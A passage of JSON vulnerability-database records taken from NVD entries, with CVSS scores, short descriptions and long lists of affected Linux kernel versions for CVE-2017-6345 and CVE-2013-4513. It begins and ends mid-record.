"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-5343", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:o:linux:linux_kernel:3.19.8:*:*:*:*:*:*:*"]}, {"lastseen": "2023-05-27T15:02:40", "description": "The LLC subsystem in the Linux kernel before 4.9.13 does not ensure that a certain destructor exists in required circumstances, which allows local users to cause a denial of service (BUG_ON) or possibly have unspecified other impact via crafted system calls.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2017-03-01T20:59:00", "type": "cve", "title": "CVE-2017-6345", "cwe": ["CWE-20"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-6345"], "modified": "2018-08-24T10:29:00", "cpe": ["cpe:/o:linux:linux_kernel:4.9.12"], "id": "CVE-2017-6345", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-6345", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:o:linux:linux_kernel:4.9.12:*:*:*:*:*:*:*"]}, {"lastseen": "2023-05-26T14:11:41", "description": "Buffer overflow in the oz_cdev_write function in drivers/staging/ozwpan/ozcdev.c in the Linux kernel before 3.12 allows local users to cause a denial of service or possibly have unspecified other impact via a crafted write operation.", "cvss3": {}, "published": "2013-11-12T14:35:00", "type": "cve", "title": "CVE-2013-4513", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "NONE", "baseScore": 4.9, "vectorString": "AV:L/AC:L/Au:N/C:N/I:N/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-4513"], "modified": "2023-02-13T04:47:00", "cpe": ["cpe:/o:linux:linux_kernel:3.0.38", "cpe:/o:linux:linux_kernel:3.10.2", "cpe:/o:linux:linux_kernel:3.0.8", "cpe:/o:linux:linux_kernel:3.9.4", "cpe:/o:linux:linux_kernel:3.0.23", "cpe:/o:linux:linux_kernel:3.6.4", "cpe:/o:linux:linux_kernel:3.0.51", "cpe:/o:linux:linux_kernel:3.10.6", "cpe:/o:linux:linux_kernel:3.0.1", "cpe:/o:linux:linux_kernel:3.2.24", "cpe:/o:linux:linux_kernel:3.7.10", "cpe:/o:linux:linux_kernel:3.10.13", "cpe:/o:linux:linux_kernel:3.6", "cpe:/o:linux:linux_kernel:3.8.9", "cpe:/o:linux:linux_kernel:3.8.3", "cpe:/o:linux:linux_kernel:3.2.18", "cpe:/o:linux:linux_kernel:3.0.28", "cpe:/o:linux:linux_kernel:3.1.2", "cpe:/o:linux:linux_kernel:3.7.5", "cpe:/o:linux:linux_kernel:3.0.9", "cpe:/o:linux:linux_kernel:3.8.0", "cpe:/o:linux:linux_kernel:3.3.1", "cpe:/o:linux:linux_kernel:3.5.3", "cpe:/o:linux:linux_kernel:3.8.4", "cpe:/o:linux:linux_kernel:3.2.7", "cpe:/o:linux:linux_kernel:3.0.26", "cpe:/o:linux:linux_kernel:3.4.4", "cpe:/o:linux:linux_kernel:3.4.25", "cpe:/o:linux:linux_kernel:3.5.7", "cpe:/o:linux:linux_kernel:3.0.44", "cpe:/o:linux:linux_kernel:3.0.63", "cpe:/o:linux:linux_kernel:3.1.8", "cpe:/o:linux:linux_kernel:3.4.24", "cpe:/o:linux:linux_kernel:3.2.11", "cpe:/o:linux:linux_kernel:3.2.26", "cpe:/o:linux:linux_kernel:3.4", "cpe:/o:linux:linux_kernel:3.0.61", "cpe:/o:linux:linux_kernel:3.10.3", "cpe:/o:linux:linux_kernel:3.8.2", "cpe:/o:linux:linux_kernel:3.7.4", "cpe:/o:linux:linux_kernel:3.0.60", "cpe:/o:linux:linux_kernel:3.4.17", "cpe:/o:linux:linux_kernel:3.8.11", "cpe:/o:linux:linux_kernel:3.2.3", "cpe:/o:linux:linux_kernel:3.8.10", "cpe:/o:linux:linux_kernel:3.2.28", "cpe:/o:linux:linux_kernel:3.0.16", "cpe:/o:linux:linux_kernel:3.4.15", "cpe:/o:linux:linux_kernel:3.10.11", "cpe:/o:linux:linux_kernel:3.3.3", "cpe:/o:linux:linux_kernel:3.8.8", "cpe:/o:linux:linux_kernel:3.2.22", "cpe:/o:linux:linux_kernel:3.0.14", "cpe:/o:linux:linux_kernel:3.10.10", "cpe:/o:linux:linux_kernel:3.2.13", "cpe:/o:linux:linux_kernel:3.7.2", "cpe:/o:linux:linux_kernel:3.10.14", "cpe:/o:linux:linux_kernel:3.0.11", "cpe:/o:linux:linux_kernel:3.9.10", "cpe:/o:linux:linux_kernel:3.8.1", "cpe:/o:linux:linux_kernel:3.2.4", "cpe:/o:linux:linux_kernel:3.9.0", "cpe:/o:linux:linux_kernel:3.1.9", "cpe:/o:linux:linux_kernel:3.2.19", "cpe:/o:linux:linux_kernel:3.0.48", "cpe:/o:linux:linux_kernel:3.10.0", "cpe:/o:linux:linux_kernel:3.0.2", "cpe:/o:linux:linux_kernel:3.5.1", "cpe:/o:linux:linux_kernel:3.0.30", "cpe:/o:linux:linux_kernel:3.0.36", "cpe:/o:linux:linux_kernel:3.0.18", "cpe:/o:linux:linux_kernel:3.5.6", "cpe:/o:linux:linux_kernel:3.5.5", "cpe:/o:linux:linux_kernel:3.0.20", "cpe:/o:linux:linux_kernel:3.0.47", "cpe:/o:linux:linux_kernel:3.9.5", "cpe:/o:linux:linux_kernel:3.10.4", "cpe:/o:linux:linux_kernel:3.0.6", "cpe:/o:linux:linux_kernel:3.6.6", "cpe:/o:linux:linux_kernel:3.2.8", "cpe:/o:linux:linux_kernel:3.4.16", "cpe:/o:linux:linux_kernel:3.0.25", "cpe:/o:linux:linux_kernel:3.4.20", "cpe:/o:linux:linux_kernel:3.0.62", "cpe:/o:linux:linux_kernel:3.9", "cpe:/o:linux:linux_kernel:3.6.2", "cpe:/o:linux:linux_kernel:3.11.2", "cpe:/o:linux:linux_kernel:3.0.65", "cpe:/o:linux:linux_kernel:3.0.42", "cpe:/o:linux:linux_kernel:3.4.18", "cpe:/o:linux:linux_kernel:3.9.11", "cpe:/o:linux:linux_kernel:3.0.3", "cpe:/o:linux:linux_kernel:3.6.1", "cpe:/o:linux:linux_kernel:3.1.4", "cpe:/o:linux:linux_kernel:3.4.12", "cpe:/o:linux:linux_kernel:3.0.43", "cpe:/o:linux:linux_kernel:3.0.13", "cpe:/o:linux:linux_kernel:3.6.7", "cpe:/o:linux:linux_kernel:3.6.10", "cpe:/o:linux:linux_kernel:3.7.1", "cpe:/o:linux:linux_kernel:3.0.7", "cpe:/o:linux:linux_kernel:3.2.29", "cpe:/o:linux:linux_kernel:3.11.6", "cpe:/o:linux:linux_kernel:3.1.10", "cpe:/o:linux:linux_kernel:3.0.19", "cpe:/o:linux:linux_kernel:3.6.8", "cpe:/o:linux:linux_kernel:3.4.10", "cpe:/o:linux:linux_kernel:3.4.11", "cpe:/o:linux:linux_kernel:3.4.26", "cpe:/o:linux:linux_kernel:3.2.21", "cpe:/o:linux:linux_kernel:3.11.1", "cpe:/o:linux:linux_kernel:3.2.15", "cpe:/o:linux:linux_kernel:3.7.9", "cpe:/o:linux:linux_kernel:3.4.9", "cpe:/o:linux:linux_kernel:3.4.3", "cpe:/o:linux:linux_kernel:3.0.56", "cpe:/o:linux:linux_kernel:3.4.32", "cpe:/o:linux:linux_kernel:3.0.55", "cpe:/o:linux:linux_kernel:3.0.29", "cpe:/o:linux:linux_kernel:3.0.33", "cpe:/o:linux:linux_kernel:3.2.17", "cpe:/o:linux:linux_kernel:3.0", "cpe:/o:linux:linux_kernel:3.4.6", "cpe:/o:linux:linux_kernel:3.4.30", "cpe:/o:linux:linux_kernel:3.0.37", "cpe:/o:linux:linux_kernel:3.3.7", "cpe:/o:linux:linux_kernel:3.0.58", "cpe:/o:linux:linux_kernel:3.0.17", "cpe:/o:linux:linux_kernel:3.3.5", "cpe:/o:linux:linux_kernel:3.8.7", "cpe:/o:linux:linux_kernel:3.4.29", "cpe:/o:linux:linux_kernel:3.4.22", "cpe:/o:linux:linux_kernel:3.4.13", "cpe:/o:linux:linux_kernel:3.3.6", "cpe:/o:linux:linux_kernel:3.4.23", "cpe:/o:linux:linux_kernel:3.7.6", "cpe:/o:linux:linux_kernel:3.6.11", "cpe:/o:linux:linux_kernel:3.9.6", "cpe:/o:linux:linux_kernel:3.10.9", "cpe:/o:linux:linux_kernel:3.6.9", "cpe:/o:linux:linux_kernel:3.10.12", "cpe:/o:linux:linux_kernel:3.3", "cpe:/o:linux:linux_kernel:3.2.6", "cpe:/o:linux:linux_kernel:3.4.2", "cpe:/o:linux:linux_kernel:3.8.12", "cpe:/o:linux:linux_kernel:3.9.9", "cpe:/o:linux:linux_kernel:3.1.7", "cpe:/o:linux:linux_kernel:3.4.14", "cpe:/o:linux:linux_kernel:3.0.35", "cpe:/o:linux:linux_kernel:3.0.49", "cpe:/o:linux:linux_kernel:3.0.32", "cpe:/o:linux:linux_kernel:3.4.1", "cpe:/o:linux:linux_kernel:3.2", "cpe:/o:linux:linux_kernel:3.10.7", "cpe:/o:linux:linux_kernel:3.2.16", "cpe:/o:linux:linux_kernel:3.8.5", "cpe:/o:linux:linux_kernel:3.10.16", "cpe:/o:linux:linux_kernel:3.2.5", "cpe:/o:linux:linux_kernel:3.6.5", "cpe:/o:linux:linux_kernel:3.7", "cpe:/o:linux:linux_kernel:3.0.22", "cpe:/o:linux:linux_kernel:3.0.52", "cpe:/o:linux:linux_kernel:3.0.24", "cpe:/o:linux:linux_kernel:3.10.18", "cpe:/o:linux:linux_kernel:3.5.4", "cpe:/o:linux:linux_kernel:3.0.66", "cpe:/o:linux:linux_kernel:3.2.30", "cpe:/o:linux:linux_kernel:3.11.5", "cpe:/o:linux:linux_kernel:3.6.3", "cpe:/o:linux:linux_kernel:3.10.8", "cpe:/o:linux:linux_kernel:3.2.25", "cpe:/o:linux:linux_kernel:3.9.7", "cpe:/o:linux:linux_kernel:3.10.17", "cpe:/o:linux:linux_kernel:3.0.27", "cpe:/o:linux:linux_kernel:3.2.10", "cpe:/o:linux:linux_kernel:3.0.31", "cpe:/o:linux:linux_kernel:3.0.57", "cpe:/o:linux:linux_kernel:3.0.21", "cpe:/o:linux:linux_kernel:3.1.3", "cpe:/o:linux:linux_kernel:3.1.5", "cpe:/o:linux:linux_kernel:3.11", "cpe:/o:linux:linux_kernel:3.0.46", "cpe:/o:linux:linux_kernel:3.0.64", "cpe:/o:linux:linux_kernel:3.2.9", "cpe:/o:linux:linux_kernel:3.1.1", "cpe:/o:linux:linux_kernel:3.0.34", "cpe:/o:linux:linux_kernel:3.7.3", "cpe:/o:linux:linux_kernel:3.4.5", "cpe:/o:linux:linux_kernel:3.4.19", "cpe:/o:linux:linux_kernel:3.9.3", "cpe:/o:linux:linux_kernel:3.0.15", "cpe:/o:linux:linux_kernel:3.0.67", "cpe:/o:linux:linux_kernel:3.8.13", "cpe:/o:linux:linux_kernel:3.0.10", "cpe:/o:linux:linux_kernel:3.0.41", "cpe:/o:linux:linux_kernel:3.4.27", "cpe:/o:linux:linux_kernel:3.0.53", "cpe:/o:linux:linux_kernel:3.2.2", "cpe:/o:linux:linux_kernel:3.9.8", "cpe:/o:linux:linux_kernel:3.2.1", "cpe:/o:linux:linux_kernel:3.0.54", "cpe:/o:linux:linux_kernel:3.3.8", "cpe:/o:linux:linux_kernel:3.11.3", "cpe:/o:linux:linux_kernel:3.7.7", "cpe:/o:linux:linux_kernel:3.1", "cpe:/o:linux:linux_kernel:3.0.40", "cpe:/o:linux:linux_kernel:3.0.39", "cpe:/o:linux:linux_kernel:3.9.1", "cpe:/o:linux:linux_kernel:3.2.14", "cpe:/o:linux:linux_kernel:3.0.68", "cpe:/o:linux:linux_kernel:3.10.5", "cpe:/o:linux:linux_kernel:3.5.2", "cpe:/o:linux:linux_kernel:3.10.1", "cpe:/o:linux:linux_kernel:3.4.28", "cpe:/o:linux:linux_kernel:3.2.12", "cpe:/o:linux:linux_kernel:3.0.59", "cpe:/o:linux:linux_kernel:3.11.7", "cpe:/o:linux:linux_kernel:3.0.50", "cpe:/o:linux:linux_kernel:3.0.4", "cpe:/o:linux:linux_kernel:3.0.5", "cpe:/o:linux:linux_kernel:3.3.4", "cpe:/o:linux:linux_kernel:3.8.6", "cpe:/o:linux:linux_kernel:3.4.31", "cpe:/o:linux:linux_kernel:3.2.27", "cpe:/o:linux:linux_kernel:3.3.2", "cpe:/o:linux:linux_kernel:3.7.8", "cpe:/o:linux:linux_kernel:3.2.20", "cpe:/o:linux:linux_kernel:3.11.4", "cpe:/o:linux:linux_kernel:3.1.6", "cpe:/o:linux:linux_kernel:3.9.2", "cpe:/o:linux:linux_kernel:3.4.8", "cpe:/o:linux:linux_kernel:3.2.23", "cpe:/o:linux:linux_kernel:3.0.45", "cpe:/o:linux:linux_kernel:3.0.12", "cpe:/o:linux:linux_kernel:3.10.15", "cpe:/o:linux:linux_kernel:3.4.21", "cpe:/o:linux:linux_kernel:3.4.7"], "id": "CVE-2013-4513", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-4513", "cvss": {"score": 4.9, "vector": "AV:L/AC:L/Au:N/C:N/I:N/A:C"}, "cpe23": ["cpe:2.3:o:linux:linux_kernel:3.5.4:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.5:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4:rc3:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.30:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.68:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.10.2:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.1:*:*:*:*:*:x86:*", "cpe:2.3:o:linux:linux_kernel:3.4.30:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.12:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.23:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.13:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.62:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.3:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.9:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.52:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.1:rc1:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.27:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.10:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.3:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.41:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.26:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.11.2:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0:rc4:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.9.8:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4:rc2:*:*:*:*:x86:*", "cpe:2.3:o:linux:linux_kernel:3.4.18:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.49:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.3:rc2:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.60:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.21:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4:rc5:*:*:*:*:x86:*", "cpe:2.3:o:linux:linux_kernel:3.9.7:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.1:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4:rc7:*:*:*:*:x86:*", "cpe:2.3:o:linux:linux_kernel:3.0.16:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4:rc3:*:*:*:*:x86:*", "cpe:2.3:o:linux:linux_kernel:3.0.45:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.57:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.1.7:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.14:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0:rc3:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.3.3:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.8.1:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.20:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.7.6:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.2:*:*:*:*:*:x86:*", "cpe:2.3:o:linux:linux_kernel:3.0.36:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.8.7:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.24:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.11:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.1.5:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.10.13:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4:rc6:*:*:*:*:x86:*", "cpe:2.3:o:linux:linux_kernel:3.1:rc4:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.3:rc6:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.10.11:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.11.7:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4:rc2:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.3.4:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.5:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.8:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.10.5:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.2:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.38:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.29:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.8.9:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.5.3:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4:rc1:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.6.3:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.3:rc7:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.22:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.7.8:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.21:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.10.9:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.1:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.40:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.63:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.32:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.8.13:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.9:rc2:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.39:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.43:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.61:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.7.7:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4:*:*:*:*:*:x86:*", "cpe:2.3:o:linux:linux_kernel:3.2:rc6:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.3.8:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.11.6:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.25:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.4:*:*:*:*:*:x86:*", "cpe:2.3:o:linux:linux_kernel:3.7.4:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.2:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.22:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.1.3:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.29:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.5:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0:rc7:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.25:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.1:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.28:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.8.12:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.1:rc3:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.6.1:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2:rc5:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.42:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.15:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.1.10:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.66:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.5:*:*:*:*:*:x86:*", "cpe:2.3:o:linux:linux_kernel:3.8.10:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.18:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.48:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.8.0:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.3:*:*:*:*:*:x86:*", "cpe:2.3:o:linux:linux_kernel:3.0.58:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.51:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.9.11:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.20:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.22:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.7.10:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.16:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.10.8:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.14:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.3.6:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0:rc5:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.11.3:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.56:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.28:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.9.1:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.7:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.59:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.8:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.28:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0:rc1:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.5.1:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.65:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.6.10:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.9.5:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.32:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.19:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.27:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.3:rc1:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.9.0:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.17:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.11.1:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.7.1:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4:rc4:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.8.2:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.1.2:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2:rc4:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.17:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.4:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.11:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.18:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.8:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.10.0:*:*:*:*:*:arm64:*", "cpe:2.3:o:linux:linux_kernel:3.0.67:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.10.1:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.1:*:*:*:*:*:x86:*", "cpe:2.3:o:linux:linux_kernel:3.10.6:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.8.3:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.13:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.27:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.31:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.24:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.44:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4:rc5:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.9:rc5:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.9.6:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.6.6:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.7.9:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.21:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.12:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.11.5:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4:rc6:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.3:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.4:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.15:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.9:rc7:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.7:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.9:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.10.10:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.23:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.4:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.1.9:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.9:rc3:*:*:*:*:*:*", 